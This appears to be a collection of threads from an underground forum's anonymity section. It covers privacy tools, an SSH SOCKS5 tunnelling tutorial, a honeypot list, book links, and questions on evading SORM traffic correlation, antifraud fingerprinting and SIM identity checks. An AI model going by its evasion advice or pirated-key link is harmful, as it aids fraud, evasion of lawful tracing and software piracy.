Anonymity and Privacy Tools

ID: 676533bbb4103b69df371cb8
Thread ID: 40138
Created: 2020-07-29T06:53:04+0000
Last Post: 2020-07-29T06:53:04+0000
Author: DYER
Replies: 0 Views: 734

Just wanted to share with you some tools that you may or may not know to remain safe.

https://arx.deidentifier.org/
https://www.privacytools.io/
https://github.com/realrolfje/anonimatron
https://github.com/AxelSeg/osint-opsec-tool

Мимикрия на канальном, сетевом, и прикладном уровне.

ID: 676533bbb4103b69df371c55
Thread ID: 46993
Created: 2021-01-19T17:23:06+0000
Last Post: 2021-01-20T00:02:52+0000
Author: Choko2
Replies: 3 Views: 733

Добрый день.
Есть у меня мечта: научиться мимикрировать под пользователей разных стран. Установить популярный антидетект - не интересное, и уже готовое решение(приготовленно для масспользователя). Хочу понять как достичь цели используя фундаментальные знания. Тут нам и Олиферы в помощь, и CCNA от Cisco, и что-то чего мне пока неизвестно.
Что я знаю о сетях:
Есть у нас модель построения сети TCP/IP. Разделена она на 4 уровня.
Первый уровень - физический, нас мало интересует, так как на нем мы щупаем только битики да напряжения.
Второй уровень - канальный, где нам интересен подуровень MAC. Что мы знаем про MAC?
MAC обеспечивает адресацию и механизмы управления доступом к каналам, что позволяет нескольким терминалам или точкам доступа общаться между собой в многоточечной сети (например, в локальной или городской вычислительной сети), и эмулирует полнодуплексный логический канал связи в многоточечной сети.
Механизм адресации уровня MAC называется физической адресацией или MAC- адресами. MAC-адрес представляет собой уникальный серийный номер (см. OUI), который присваивается каждому сетевому устройству (такому, как сетевая карта в компьютере или сетевой коммутатор) во время изготовления, и позволяет однозначно определить его среди других сетевых устройств в мире. Это гарантирует, что все устройства в сети будут иметь различные MAC-адреса (по аналогии с почтовыми адресами), что делает возможным доставку пакетов данных в место назначения внутри подсети, т.е. физической сети, состоящей из нескольких сегментов, взаимосвязанных повторителями, хабами, или свитчами (но не IP-маршрутизаторами). IP-маршрутизаторы могут соединять несколько подсетей.
Что нам дает данное определение?
Если мы хотим мимикрировать, то нам необходимо менять и MAC в том числе. Так как если оставить MAC неизменным, то каждый раз меняя все свои следы мы в конце кадра будем дописывать один и тот же MAC.
Третий уровень - сетевой, тут первым делом на ум приходит IP.
Что мы знаем об IP, что это адрес, который служит для объединения компьютерных сетей. Что происходит, когда мы сменяем IP адрес? Кадр, который передается по сети теперь содержит вместо источника не ваш IP, а IP сервера. Соответственно, вы можете гулять по сети от имени сервера, но если IP пропингуют в отрыве от вашего сеанса, то получат данные сервера, что для мимикрии - провал. Если, я правильно понимаю принцип работы*.
Четвертый уровен - прикладной, где обитают наши протоколы для работы приложений. HTTPS, SSH и прочее, завязанное на определенные стандартом или вами порты. Пропинговав вас по портам, можно увидеть службы висящие на портах, и информацию об ОС, не всегда, но все же.
Если рассматривать сетевую модель, то для успешной мимикрии нам важно правильно менять ip, mac, и популярные порты. У меня нет готовых рецептов, так как я не до конца понимаю принцип работы всех доступных технологий, но буду рад услышать полезные комментарии.
Следующий шаг: замена отпечатков оставляемых нашим по, и ос.
Мы можем сменить юзерагент, использовать англ версии ос, редактировать размер экрана, и полагаю, что отпечатки железа тоже можно подменить, но у меня нет полной информации как это делать правильно, и насколько глубоко нужно копать. Надеюсь, что кто-нибудь из коллег по форуму сможет провести ликбез, представив информацию структурно.

*Если что-то намешано в кашу, то прошу помочь разобраться. Самостоятельное изучение, это хорошо, но без наставников обучение проходит медленнее.

Безопасность форума.

ID: 676533bbb4103b69df371c93
Thread ID: 42811
Created: 2020-10-03T16:09:57+0000
Last Post: 2020-10-03T19:59:08+0000
Author: negg
Replies: 3 Views: 733

Вопрос относится к безопасности. Легко ли обвалить форум? (если и не развалить,то ослабить репутацию или контент)Путем СИ. Через алгоритм многочисленных вопросов/дискуссий ( в основном демагогия,имеющая "смысл" в "теме") от новичков и тд? Как от таких СИ защищаются крупные форумы? Средние и тд. Интересно

Кибербезопасность стратегии атак и обороны [2020]

ID: 676533bbb4103b69df371b38
Thread ID: 63984
Created: 2022-03-08T13:20:46+0000
Last Post: 2022-03-09T00:37:12+0000
Author: camawe
Prefix: Мануал/Книга
Replies: 1 Views: 729

[

Кибербезопасность_стратегии_атак_и_обороны_2020_Юрий_Диогенес,_Эрдаль.pdf - AnonFiles ](https://anonfiles.com/11NaI6M3xb/_2020_pdf)

anonfiles.com

mptcp и уход от корелляционных методов слежения

ID: 676533bbb4103b69df371b83
Thread ID: 58576
Created: 2021-11-06T14:29:42+0000
Last Post: 2021-11-08T15:44:25+0000
Author: gliderexpert
Replies: 19 Views: 727

Допустим, есть некий источник траффика (source) и цель (target).
Источник и цель находится в одной стране. Соответственно, использование VPN'ов в любом варианте, включая TOR - бесполезно, т.к. цепочку можно отследить по размеру пакетов и времени доставки, кореллируя данные СОРМа на передающей стороне, с данными СОРМа на принимающей стороне. Так можно начинать собирать доказательную базу причастности источника траффика к траффику идущему на цель.

Интересно мнение опытных специалистов, насколько в данной ситуации поможет следующая схема - делим исходящий траффик на несколько каналов при помощи методов multipatch tcp , каждый из этих каналов заворачиваем в TOR. Сумматор mptcp ставим на зарубежный VDS , и траф с него заводим обратно в страну где находится source.

По идее, можно обнаружить только факт использования mptcp , и отследить наши устройства, использующие mptcp - но вот смогут ли "умные люди" /*работающие зачем-то на "дядю" */ , собрать разные каналы в один поток и скорелировать его с трафом на цель? Ведь аплинки mptcp будут уже в цепочке тора.

Примерно такая схема

Что анонимнее: Monero, zCash или Bitcoin mixer?

ID: 676533bbb4103b69df371baf
Thread ID: 55983
Created: 2021-08-28T16:24:08+0000
Last Post: 2021-09-02T12:54:28+0000
Author: chillco
Replies: 12 Views: 723

Здравствуйте. Интересует тема анонимных и безопасных переводов. Под безопасностью имеется в виду сложность отслеживания переводов, получение получателя имея отправителя или наоборот.
Думаю, что самое безопасное - переводы с криптовалюте. Хочу узнать Ваше мнение. Насколько безопасен Monero? В 2017 году уже была уязвимость позволяющая раскрыть отправителя и получателя монет. Как сейчас с этим обстоят дела? Смогут ли на данный момент отследить перевод спецслужбы?

Так же почти везде где упоминается тема анонимных криптовалют упоминается и zCash и его stealth addresses. В подробности реализации такой анонимности я не вдавался, поэтому хочу узнать Ваше мнение, безопаснее ли zCash чем monero?

И насколько безопасен по сравнению с этими двумя криптовалютами биткоин(а может и не биткоин) миксер?

Физическая симка во время проверок данных от РКН

ID: 676533bbb4103b69df371a62
Thread ID: 87047
Created: 2023-05-01T12:50:35+0000
Last Post: 2023-05-11T22:05:53+0000
Author: Rill
Replies: 7 Views: 721

Недавно операторы связи начали просить у абонентов пройти сверку данных через госуслуги, не сообщая, что то же самое можно сделать в салонах связи. Кто откажется, рискует остаться без номера – операторы могут заблокировать его.

Для того чтобы у нас не требовали данные после покупки серой симки нам нужна Yota. А именно симка такого типа:

С другими не сработает ибо там уже нужна активации через госуслуги.
Данные симки продаются на рынке за копейки. Поищите там где продают пульты/телефоны/зарядки.
После того как вставил ее нужно включить мобильные данные и подождать пока придет смс. После активации я попробовал зарегать тг, однако он уже был и им пользовались относительно недавно, благо в их приложении можно менять номер раз в 10 дней.
Плюсом спустя 3 дня пришло вот такое смс:

Как вы понимаете никаких данных на проверку я не отправлял

Дополнительная информация насчет симки:
Лично у меня в городе стоит всего 100р. На балансе 0. Активация стоит 100р которые нужно закинуть. Они спишутся в течении 6 часов. Дается бесплатный тариф на месяц:

По сути за 200р 35 гигов и безлимит на тг, вк, ютуб, вацап и тт.

tails что нужно добавить, чтобы было внутрикабельным и анонимным

ID: 676533bbb4103b69df371ca3
Thread ID: 41429
Created: 2020-08-27T17:33:16+0000
Last Post: 2020-09-04T19:51:10+0000
Author: abeona11
Replies: 1 Views: 721

Хочу использовать хвосты как можно более интракабельно, что я должен добавить

Brave браузер, обсуждение

ID: 676533bbb4103b69df371a7f
Thread ID: 84376
Created: 2023-03-23T20:46:43+0000
Last Post: 2023-03-26T12:20:35+0000
Author: D4nte
Replies: 13 Views: 720

RU:
qq l33t HaXXorZ
Вообщем считаете ли что Brave достоин в плане конфиденциальности чем
другие браузеры на подобии google,yandex и прочие большое-братовское дерьмо?.
Можете дать совет какой лучше всего для основного выхода в интернет(не для чернухи)
использовать браузер к примеру выхода в интернет на этот форум.
Знаю что google записывает каждый запрос к себе, поэтому еще давно начал использовать duckduckgo
вопрос остановился на браузере brave,TOR юзается исключительно в виртуалке чтобы выйти в интернет для
черного-серфинга по паутине.
EN:
qq l33t HaXXorZ
In general, do you think Brave is worthy in terms of privacy than other browsers like google, yandex and other crap?.
You can give advice on how best to use a browser for basic internet access (not for blackness), such as by browsing the internet in this forum.
I know that google records every request to itself, so a long time ago I started using duckduckgo question settled on the browser brave.
TOR is used exclusively in virtual to access the Internet for black surfing on the Internet.

Посоветуйте резидентские прокси

ID: 676533bbb4103b69df371c19
Thread ID: 49781
Created: 2021-03-23T22:56:35+0000
Last Post: 2021-03-23T22:56:35+0000
Author: MAS0N
Replies: 0 Views: 718

Приветствую, посоветуйте резидентные прокси, по типу 911. Если конкретно, то нужен сервис где есть такая же большая выборка по странам и городам как и в 911

Особенности киберпреступлений в России: инструменты нападения и защита информации, Масалков [2017]

ID: 676533bbb4103b69df371b34
Thread ID: 64279
Created: 2022-03-15T08:38:27+0000
Last Post: 2022-03-15T08:38:27+0000
Author: camawe
Prefix: Мануал/Книга
Replies: 0 Views: 718

[

Особенности_киберпреступлений_в_России_инструменты_нападения_и_защита.pdf - AnonFiles ](https://anonfiles.com/B3uavfO4x5/_pdf)

anonfiles.com

Мануалы по анонимности в сети 🤫

ID: 676533bbb4103b69df3719ed
Thread ID: 100464
Created: 2023-10-19T19:05:50+0000
Last Post: 2023-11-03T20:54:00+0000
Author: Valery
Prefix: Мануал/Книга
Replies: 1 Views: 716

Вы попадете на гугл диск со сборником мануалов по анонимности. Мануалы взяты с форумов и различных тг каналов. Правда стареньких(

[ Слив-пак №71 – Google Drive

](https://drive.google.com/drive/folders/1Tq4ILvxt3HMahGt27h_cT0Ke8UaMoPUt)

drive.google.com

Антифрод системы и электронная почта

ID: 676533bbb4103b69df371b40
Thread ID: 60943
Created: 2022-01-06T20:23:23+0000
Last Post: 2022-02-19T22:08:49+0000
Author: obtim
Replies: 4 Views: 715

Был уверен, что при общении со службами поддержки(не важно каких организаций) через публичные почтовые системы(Google, Yandex, Mail.ru почты и т.п.) антифрод системы(если они существуют и настроены) с их стороны не в состоянии отследить ситуации, когда почтовые сообщения, поступающие от разных отправителей, в реальности отправляются с одного ПК(одним человеком).
Но тут в беседе ткнули носом, что современные антифрод системы в состоянии выдергивать какие-то данные из служебного заголовка писем и добавлять к ним сторонние метрики, что в результате позволяет однозначно идентифицировать одинаковых пользователей. Подробностей не раскрыли.
Может кто-то рассказать по подробней: возможна ли(не в теории) идентификация пользователя через переписку с разных публичных почтовых адресов?

Создание прокси-сервера SOCKS5 из туннеля SSH в операционных системах Windows и Linux

ID: 676533bbb4103b69df371a2a
Thread ID: 91251
Created: 2023-06-24T12:42:56+0000
Last Post: 2023-08-15T08:02:25+0000
Author: yoka
Prefix: Статья
Replies: 1 Views: 714

Введение. В нашей деятельности конфиденциальность и безопасность имеют первостепенное значение. Одним из эффективных способов обеспечения безопасного и анонимного подключения к интернету является настройка прокси-сервера SOCKS5 с использованием туннеля SSH. Это руководство проведет вас через процесс в различных операционных системах таких как Windows и Linux, что позволит вам установить надежный прокси-сервер SOCKS5 для повышения конфиденциальности и безопасности.

В этой статье мы рассмотрим:

• поднятия SOCKS5 из тунеля SSH в ОС windows
• Метод с использованием putty
• Метод с использованием Bitvise
• Заворачиваем весь трафика системы в созданный нами прокси в ОС Windows при помощи proxyfire

• поднятия SOCKS5 из тунеля SSH в ОС Linux
• Заворачиваем весь трафика системы в созданный нами прокси в ОС Linux по средствам iptables
• Заворачиваем весь трафика системы через прокси, вариант через GUI
• Пускаем трафик отдельного приложения через наш socks по средствам Proxychains

I. Настройка прокси-сервера SOCKS5 в Windows:

Вариант исполнения через putty

Первым делом необходимо загрузить клиент putty, скачать putty можно здесь

Чтобы установить туннель SSH при помощи PuTTY, выполняем следующие действия:

Открываем PuTTY и вводим IP-адрес нашего или не совсем нашего сервера)

Далее разворачиваем раздел «SSH» в меню «Connection» и выбираем «Tunnels».

В поле «Source Port» вводим желаемый номер порта, например 1081, это будет порт создаваемого нами SOCKS5.
Устанавливаем галку «Динамический», чтобы включить динамическую переадресацию портов.

Клацаем кнопку «Add».
Возвращаемся на вкладку Session, чтобы сохранить настройки для использования нашего конфига в будущем. Вводим имя в поле «Saved session» и нажмите «Сохранить».

Выбираем сохраненный нами ранее сеанс и нажимаем «Открыть», чтобы начать SSH- соединение.
Появится новое окно, предлагающее ввести имя пользователя и пароль для удаленного сервера. Указываем учетные данные....

Чтобы каждый раз не вводить пароль, можно настроить аутентификацию по средствам ключа.

Вариант исполнения через Bitvise

Загружаем и устанавливаем Bitvise SSH Client с официального сайта, тык
Запускаем Bitvise
Во вкладке «Login» вводим IP-адрес и порт сервера, а так же логин и пароль

Переходим во вкладку «Services» ставим галку на «SOCKS/HTTP proxy Forwarding» задаем желаемый порт, в нашем примере 1081.

Заворачиваем весь трафика системы в созданный нами прокси в ОС Windows при помощи proxyfire

Качаем proxifier с официального сайта тык, затем устанавливаем его

По дефолту у вас будет пробная версия длительностью в 31 день, для тех кто не желает тратится на лицензию вот ссылка на github с актуальными ключами активации, тык

Далее что бы завернуть весь трафик через наш созданный SOCKS на предыдущих шагах переходи во вкладку в proxifier «Profile» > «Proxy servers...» > «Add» вводим 127.0.0.1 и порт который мы указывали на предыдущих шагах при создании SOCKS5 (в нашем случае это 1081) указываем Protocol «SOCKS Version 5» жмем OK

После заходим «Profile» > «Name Resolution» cнимаем галку с «Detect DNS setting automatically» и ставим галку «Resolve hostnames through proxy» жмем ОК

Готово, остается посетить whoer.net и убедится, что все работает корректно.

II. Создание прокси-сервера SOCKS5 в Linux:

Установка OpenSSH в Linux:

Открываем терминал.

Для систем на основе Ubuntu и Debian используем команду:

sudo apt-get install openssh-client

Запуск SSH-туннеля:

Открываем терминал и вводим следующую команду для подключения к удаленному серверу и установки туннеля SSH:

ssh -D 1080 -4 username@remote_server

Меняем username и remote_server под свои вводные данные.

Настройка параметров прокси:

Чтобы перенаправить весь системный трафик через созданный и запущенный ранее SOCKS5 (в нашем случае, 127.0.0.1:1081) с помощью iptables в Linux, мы используем REDIRECT и PREROUTING цепочку в nat таблице.

Очищаем все существующие правила iptables:

Bash:Copy to clipboard

sudo iptables -F sudo iptables -t nat -F

Включаем IP-переадресацию:

Code:Copy to clipboard

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Настраиваем правило iptables для перенаправления всего трафика на наш прокси- сервер:

Code:Copy to clipboard

sudo iptables -t nat -A OUTPUT -p tcp -j REDIRECT --to-ports 1081

Настраиваем PREROUTING цепочку для перенаправления входящего трафика на прокси-сервер:

Code:Copy to clipboard

sudo iptables -t nat -A PREROUTING -p tcp -j REDIRECT --to-ports 1081

Сохраняем правила iptables:

Code:Copy to clipboard

sudo iptables-save | sudo tee /etc/iptables/rules.v4

Чтобы созданные нами правила применялись при загрузке системы, нам нужно добавить скрипт, который их будет загружать. Создаеме файл, например, iptables.sh, и добавляем следующее содержимое:

Bash:Copy to clipboard

#!/bin/sh /sbin/iptables-restore < /etc/iptables/rules.v4

Делаем скрипт исполняемым:

Code:Copy to clipboard

sudo chmod +x iptables.sh

Добавляем скрипт в автозагрузку:

Code:Copy to clipboard

sudo cp iptables.sh /etc/network/if-pre-up.d/

Перезагружаем систему, и весь системный трафик должен быть перенаправлен через прокси-сервер по адресу 127.0.0.1:1081

Готово, остается посетить whoer.net и убедится, что все работает корректно.

альтернативный вариант через GUI
В зависимости от вашего дистрибутива Linux и среды рабочего стола откройте настройки сети или прокси-сервера.
Найдите раздел конфигурации прокси и введите 127.0.0.1 в качестве хоста SOCKS и 1081 порта.

Сохраняем изменения и закрываем настройки.

Пускаем трафик отдельного приложения через наш socks по средствам Proxychains.

Чтобы направить трафик отдельного приложения через прокси мы используем proxychains. Вот общий подход с использованием Proxychains:

Установим Proxychains:

Code:Copy to clipboard

sudo apt update sudo apt install proxychains

Настройка proxychains:

Открываем файл конфигурации Proxychains удобным для вас текстовым редактором в моем случае sudo nano /etc/proxychains.conf

Раскомментируйте строку dynamic_chain , удалив «#» в начале.
Раскомментируйте строку HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS .

Прокручиваем вниз до [ProxyList].
Добавляем данные прокси-сервера в формате: protocol ip_address port. Например, socks5 127.0.0.1 1081.
Сохраняем изменения и выходим из текстового редактора.

Тестируем работу прокси:

Открываем терминал.
Используем команду proxychains, за которой следует программа, которую мы хотитм запустить через прокси. Например, proxychains curl google.com
Если прокси работает корректно, в выводе должно быть указано, что запрос был сделан через прокси.

Вывод: следуя описанным выше шагам, вы можете легко создать прокси SOCKS5 из туннеля SSH как в операционных системах Windows, так и в Linux. Эта настройка позволяет направлять ваш интернет-трафик через безопасное и зашифрованное соединение, обеспечивая конфиденциальность и защиту конфиденциальной информации.

© Автор: yoka
Специально для XSS.IS

Какой vpn использовать лучше всего?

ID: 676533bbb4103b69df371ac6
Thread ID: 70798
Created: 2022-07-28T20:26:08+0000
Last Post: 2022-08-30T05:11:05+0000
Author: avas
Replies: 12 Views: 709

Какой vpn использовать лучше всего?

Hands-On Incident Response Analysis

ID: 676533bbb4103b69df371b4f
Thread ID: 57196
Created: 2021-09-29T16:58:29+0000
Last Post: 2022-01-29T00:06:11+0000
Author: Grotendique
Prefix: Видео
Replies: 3 Views: 707

️ Discovering Incident Response
️ Detecting and Preventing Attacks on the Host and Networks
️ Building Defense for Services and Attacks on Applications
️ Detecting and Handling Malicious Code
️ Implementing Forensics for Incident Response
️ Preventing Insider Threats: Detection and Handling

[DOWNLOAD](https://anonfiles.com/n407B6K3uc/Hands- On_Incident_Response_Analysis_rar)

Основы кибербезопасности. Cтандарты, концепции, методы и средства обеспечения (Белоус А. И.)

ID: 676533bbb4103b69df371b3f
Thread ID: 63249
Created: 2022-02-20T11:00:12+0000
Last Post: 2022-02-20T11:00:12+0000
Author: camawe
Prefix: Мануал/Книга
Replies: 0 Views: 707

[ Основы_кибербезопасности_Cтандарты,_концепции,_методы_и_средства.pdf -

AnonFiles ](https://anonfiles.com/peL5h7Jdx4/_C_pdf)

anonfiles.com

Спецсвязь и прослушка в Украине. Вадим Гребенников

ID: 676533bbb4103b69df371b16
Thread ID: 66507
Created: 2022-05-03T06:57:40+0000
Last Post: 2022-05-03T06:57:40+0000
Author: camawe
Prefix: Мануал/Книга
Replies: 0 Views: 707

[ Спецсвязь и прослушка в Украине. Вадим Гребенников.pdf - AnonFiles

](https://anonfiles.com/10uaAac9ye/_._pdf)

anonfiles.com

Звонки через Whonix

ID: 676533bbb4103b69df3719ba
Thread ID: 103058
Created: 2023-11-27T11:50:10+0000
Last Post: 2024-01-28T15:30:42+0000
Author: alexxs
Replies: 24 Views: 701

Всех приветствую. Хуникс не пропускает звонки. Подскажите как настроить , чтобы хуникс пропускал звонки и будет ли это безопасно? если нет подскажите способ как делать звонки анонимно и безопасно

Более 70 ханипотов, honeypots (Hubr)

ID: 676533bbb4103b69df3719ee
Thread ID: 99078
Created: 2023-09-29T15:35:04+0000
Last Post: 2023-11-01T20:41:52+0000
Author: Rostik_mostik
Replies: 3 Views: 699

70+ бесплатных приманок для ловли хакеров

Сегодня поделюсь подборкой open source ханипотов, которые можно использовать для защиты своих серверов и локальных сетей от кибератак, но для начала давайте разберемся, что такое ханипот и зачем он нужен.

Honeypot — это приманка для хакеров, которая имитирует реальную цель атаки. Он может имитировать любой цифровой актив, например, сервер, приложение, устройство или даже отдельный документ. Такие приманки создаются специально, чтобы привлечь внимание злоумышленников и отвлечь их от настоящих целей.

Самые простые приманки (с низким уровнем взаимодействия) выглядят правдоподобно лишь на первый взгляд, пока с ними не начинаешь взаимодействовать. Ханипоты с высоким уровнем взаимодействия копируют реальную систему вплоть до мелочей и ведут себя так же.

Ханипоты не только замедляют атаку и дезориентируют злоумышленников. Они также посылают сигналы тревоги и собирают информацию об атакующем. В некоторых случаях этих данных хватает, чтобы понять его методы и мотивы. С помощью ханипотов можно получать ранние предупреждения о начавшейся атаке, выявлять "слепые пятна" в существующей архитектуре безопасности и совершенствовать стратегию защиты в целом.

Теперь давайте посмотрим на подборку из более чем 70 open source ханипотов, которые можно поставить и попробовать прямо сейчас.

Как обычно, напоминаю, что этот список не претендует на 100% полноту и объективность. Здесь представлены те проекты, которые показались мне полезными и актуальными. Я не включал в список ханипоты, которые давно не обновлялись или не получали реквестов на github. Но если вы знаете еще какие-то классные ханипоты, которые я пропустил, то пишите в комментариях.

Комплексные системы развертывания приманок, управляющие платформы

deception-системы

Одного-двух ханипотов может быть недостаточно, особенно если речь идет о защите больших корпоративных сетей. Приманки становятся действительно эффективными, когда их много, ведь тогда хакер быстрее найдет одну из них. В идеале информацию с приманок нужно собирать и анализировать в режиме реального времени. В ответ на этот запрос появились deception-системы — программы для массового развертывания и управления приманками. Мы подробно рассказывали об этом в одной из наших статей. В основном это готовые коммерческие решения, но это не значит, что не существует рабочих open source альтернатив. Возможно, они не такие функциональные и удобные, но свою функцию выполняют.

T-Pot — платформа для развертывания и контроля за ханипотами на базе Debian 11 и Docker. Поддерживает многие из перечисленных ниже приманок: dionaea, Conpot, DDoSPot, Dicompot, HellPot, Log4Pot — больше 20 разных видов ханипотов. Кроме того, T-Pot работает с рядом вспомогательных утилит для визуализации и картирования атак. В паре с GreedyBear она позволяет легко анализировать зафиксированные киберугрозы.

DejaVU — deception-платформа для развертывания приманок в облаках AWS и внутренних сетях. Предлагает 14 серверных приманок, от MySQL и TELNET до HONEYCOMB, различные приманки-клиенты, например, SSDP, позволяет разбрасывать хлебные крошки в виде файлов, HoneyHash и учетных записей Kerberoast.

Ehoney — система управления приманками с имитацией SSH, Http, Redis, Telnet, Mysql, RDP, RTSP, ModBus и заявкой на звание полноценной deception-системы. Утверждается, что Ehoney позволяет отслеживать действия злоумышленников в реальном времени, прогнозировать их и активно противодействовать, замедляя атаку при помощи распространения новых ложных целей.

OWASP Honeypot — еще одна комплексная система управления приманками на базе контейнеров Docker. Эта система предлагает автоматизированный процесс настройки, фиксирует веб и сетевые атаки. Она создана известным сообществом безопасников, однако с октября 2021 года не получала серьезных обновлений и все еще находится на ранней стадии разработки.

DecoyMini — система управления приманками, которая поддерживает быстрое развертывание групп приманок в один клик, использует виртуальные IP-адреса, поддерживает основные операционные системы (Windows, CentOS/Ubuntu/Debian/Kali , Raspberry Pi), поддерживает Docker.

HFish — кросс-платформенная система управления приманками с низким и средним уровнем взаимодействия. Предлагает более 40 видов ханипотов, имитирующих базовые сетевые службы, CRM, NAS, веб-серверы, точки доступа Wi-Fi, беспроводные точки доступа, коммутаторы и маршрутизаторы, почтовые сервера, IoT-устройства.

Honeytrap — агент-серверная система для запуска, мониторинга и управления приманками. Развертывает сети сенсоров из приманок с низким уровнем взаимодействия и при необходимости быстро обновляет их до ханипотов высокого уровня. Интегрируется с cowrie и glutton, взаимодействует с Elasticsearch, Splunk, Raven Server, Slack, Kafka.

Chameleon — 19 настраиваемых приманок для мониторинга сетевого трафика, действий ботов и учетных данных (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, SMTP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres, MySQL, MSSQL). Предлагает графический интерфейс на базе Grafana для мониторинга результатов их работы.

Community Honey Network — хорошо документированный управляющий сервер в комплекте с готовыми скриптами развертывания приманок на базе Docker и Docker Compose. Позволяет установить и отслеживать работу таких приманок, как Cowrie, Dionaea, ssh-auth-logger, Conpot, RDPhoney, UHP.

MHN — централизованный сервер для управления и сбора данных с приманок Snort, Cowrie, Dionaea и glastopf. Выводит данные с них в удобный веб-интерфейс. Предоставляет REST API. Существует и в версии для работы в Docker.

OpenCanary — это демон, который запускает несколько версий ханипотов. Может имитировать Linux Web Server, Windows Server, MySQL Server и MSSQL-сервера. Собирает оповещения в системном журнале и отправляет на электронную почту.

opencanary_web — еще одна платформа для управления ханипотами, собранная из Tornado, Vue, Mysql, APScheduler и Nginx.

prickly-pete — скрипт, который использует Docker для быстрого запуска приманок: contpot, cowrie, HoneyPress, gate, udpot. В совокупности они позволяют имитировать 16 разных веб-сервисов.

Honeypots — 30 приманок низко-высокого уровня для мониторинга сетевого трафика, активности ботов и учетных данных в одном пакете PyPI. Имитируют dhcp, dns, elastic, ftp, http proxy, https proxy, http, https, imap, ipp, irc, ldap, memcache, mssql, mysql, ntp, oracle, pjl, pop3, postgres, rdp, redis, sip, smb, smtp, snmp, socks5, ssh, telnet, vnc.

Веб-приманки

Здесь перечислены более простые, отдельные ханипоты, которые имитируют веб- сайты и сервисы. Они поддерживают разные протоколы, например, HTTP, HTTPS, FTP, SSH и т. д. У некоторых есть встроенная аналитика для отслеживания и анализа активности на приманке, но они не сравнятся по сложности с deception- системами.

Многопротокольные веб-приманки

Dionaea — многопротокольная приманка, которая охватывает все — от FTP до SIP (атаки на VoIP). Первоначально разработана для сбора образцов вредоносных программ. Dionaea имеет модульную архитектуру и использует Python в качестве языка сценариев для эмуляции протоколов. Она может имитировать выполнение полезной нагрузки вредоносного ПО с помощью LibEmu.

HoneyHTTPD — утилита для создания веб-приманок на основе Python. Она позволяет легко настраивать поддельные веб-серверы и веб-службы, отвечать на уровне протокола HTTP теми данными, которыми вы захотите, и записывать переданные серверу запросы.

medusa — быстрая и безопасная многопротокольная приманка, которая может имитировать ssh, telnet, http, https или любой другой tcp, а также udp-серверы.

Glastopf — первый из четырех проектов австрийского НКО MushMush Foundation — приманка на базе Python, имитирующая внедрение файлов при помощи песочницы PHP и HTML-инъекции через POST-запросы. В настоящее время не обновляется, однако ее разработчики предлагают альтернативы:

SNARE и TANNER — по первой ссылке расположен репозиторий датчика веб-приманки, аналогичной Glastopf и способной преобразовывать веб-страницы в поверхности для атак. TANNER — "мозг" этой ловушки. Каждое событие, отправленное из SNARE в TANNER, оценивается, и TANNER решает, как должна реагировать приманка. Такие динамические ответы помогают поддерживать маскировку.

fapro — кросс-платформенная утилита для симуляции сетевых служб. Она создана, чтобы поддерживать как можно больше протоколов — более 50 штук — и глубокое взаимодействие с ними.

Masscanned — приманка с низким уровнем взаимодействия, ориентированная на сетевые сканеры и ботов. Отвечает на их запросы по различным протоколам. Интегрируется с IVRE и позволяет собирать черные списки IP-адресов, подобно тому как это делает GreyNoise.

Mimicry — приманка, рассчитанная на активный обман и имитацию уязвимостей в веб-приложениях. Позволяет оперативно подменить Webshell, ReverseShell/BindShell на приманку.

Heralding — простая приманка, которая собирает учетные данные. Поддерживает протоколы: ftp, telnet, ssh, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql и socks5.

Honeydb-agent — небольшая программа-приманка, которую можно легко развернуть в системах Linux и Windows. Может запускать многочисленные эмуляции сетевых служб при помощи подключаемых плагинов. Может работать в автономном режиме или как часть глобальной мониторинговой сети HoneyDB.

Beelzebub — фреймворк для создания SSH, HTTP и TCP-ханипотов, который можно настроить с помощью yaml. Интегрируется с RabbitMQ и OpenAPI ChatBot GPT-3.

DDoSPot — это приманка на основе UDP для отслеживания и мониторинга распределенных DDoS-атак. Эмулирует DNS, NTP, SSDP, CHARGEN, случайные UDP-сервера.

SSH-приманки

Cowrie — приманка SSH и Telnet со средним и высоким уровнем взаимодействия. Предназначена для регистрации попыток брутфорса. В разных режимах работает как прокси-сервер для SSH и telnet или эмулирует систему UNIX с полноценной фейковой файловой системой. Хорошо работает в паре с Longitudinal Analysis для обработки журналов.

sshesame — простой в настройке поддельный SSH-сервер, который позволяет подключиться любому, и регистрирует SSH-соединения и активность, не выполняя на самом деле никаких команд и запросов.

Mushorg / Glutton — SSH и TCP-прокси, который работает как MITM между злоумышленником и сервером и позволяет шпионить за его действиями.

pshitt — легковесный поддельный SSH-сервер, предназначенный для сбора аутентификационных данных, отправленных злоумышленниками. Сохраняет в JSON логины и пароли, используемые программным обеспечением для перебора SSH.

SSH Honeypot — еще одно решение для сбора базовых сведений об атаке. Прослушивает входящие ssh-соединения и регистрирует IP-адрес, имя пользователя и пароль, которые использует клиент.

FakeSSH — докенизированный SSH-сервер-приманка с низким уровнем взаимодействия, написанный на Go. Регистрирует попытки входа в систему, но всегда отвечает, что пароль неверен.

docker-ssh-honey — еще одна простая приманка с аналогичной FakeSSH функциональностью.

ssh-auth-logger — регистрирует все попытки аутентификации в виде json, не взаимодействует со злоумышленником.

ssh-honeypotd — SSH-приманка с низким уровнем взаимодействия, написанная на C.

Honeyshell — написанная на Go SSH-приманка. Собирает логины и пароли.

Endlessh — коварная штука, которая открывает сокет и притворяется сервером SSH, который очень медленно отправляет SSH-баннер. Способна удерживать клиентов в течение нескольких часов или даже дней. Значительно замедляет и даже парализует работу ботов и сканеров.

Приманки, имитирующие базы данных

pg-server — эмулятор сервера БД Postgres, прокси и приманка.

dns.py — скрипт для создания приманки DNS, которая регистрирует все запросы к базе данных SQLite и имеет настраиваемый уровень интерактивности.

mysql-honeypotd —MySQL-приманка с низким уровнем взаимодействия, написанная на C.

RedisHoneyPot — интерактивная приманка с высоким уровнем взаимодействия для протокола Redis. Написана на Golang. Умеет имитировать выполнение команд ping, info, set, get, del, exists, keys, flushall, flushdb, save, select, dbsize, config, slaveof.

MongoDB-HoneyProxy — прокси-приманка для mongod, которая регистрирует трафик на фиктивном сервере.

RDP

ad-honeypot-autodeploy — ловушка с высоким уровнем взаимодействия — намеренно небезопасный уязвимый домен Windows. Работает в виртуальной машине на базе libvirt с QEMU/KVM, но его можно развернуть и в облаке. Состоит из Windows Server 2016 в качестве контроллера домена и машины на базе Windows 10 (21H2). На ней включены службы RDP и WinRM.

